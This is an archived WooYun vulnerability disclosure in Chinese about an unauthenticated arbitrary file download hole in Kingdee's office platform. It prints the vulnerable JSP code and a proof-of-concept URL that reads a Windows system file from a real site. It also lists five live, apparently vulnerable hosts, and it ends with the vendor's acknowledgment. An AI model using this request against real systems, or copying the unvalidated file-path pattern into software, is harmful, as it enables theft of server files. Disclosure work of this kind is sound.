乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-04: 细节已通知厂商并且等待厂商处理中 2015-08-04: 厂商已经确认,细节仅向厂商公开 2015-08-07: 细节向第三方安全合作伙伴开放 2015-09-28: 细节向核心白帽子及相关领域专家公开 2015-10-08: 细节向普通白帽子公开 2015-10-18: 细节向实习白帽子公开 2015-11-02: 细节向公众公开
金蝶协同办公平台任意文件下载漏洞(无需登录)
经测试发现,该系统存在任意文件下载,且无需登录存在漏洞的文件:
/oa/admin/application/file_download.jsp?filePath=
部分漏洞代码为:
<%@ page import="java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%><%String logPath = request.getParameter("filePath")==null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath");String contentType = request.getParameter("contentType")==null?"application/x-download":request.getParameter("contentType");String fileName = request.getParameter("fileName")==null?"file.txt":request.getParameter("fileName");java.io.OutputStream ou = null;java.io.InputStream is = null;try{ java.io.File logFile = new java.io.File(logPath); if (logFile.exists()) { is = new java.io.FileInputStream(logPath); byte[] content = new byte[1024]; int i = 0; response.setContentType(contentType); ou = response.getOutputStream(); response.setHeader("Content-Disposition", "attachment; filename=\""+fileName+"\""); while ((i = is.read(content)) != -1) { ou.write(content, 0, i); } ou.flush(); } else { out.println("file not found:"+logPath); }} catch (Exception e) { System.out.println(e);} finally { if (ou != null) ou.close(); if (is != null) is.close();}%>
很明显的任意文件下载漏洞,随便在网上找一个实例进行证明
http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath=c:\windows\win.ini
直接访问即可下载该文件了,保存的文件名为:file.txt
5个案例:
http://oa.xpngs.com/oa/themes/mskin/login/login.jsphttp://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsphttp://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsphttp://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error=quithttp://www.jrxoa.com/oa/themes/mskin/login/login.jsp
下载的文件
过滤吧
危害等级:高
漏洞Rank:15
确认时间:2015-08-04 15:34
谢谢对金蝶安全的关注,我们已通知相关部门处理。
暂无
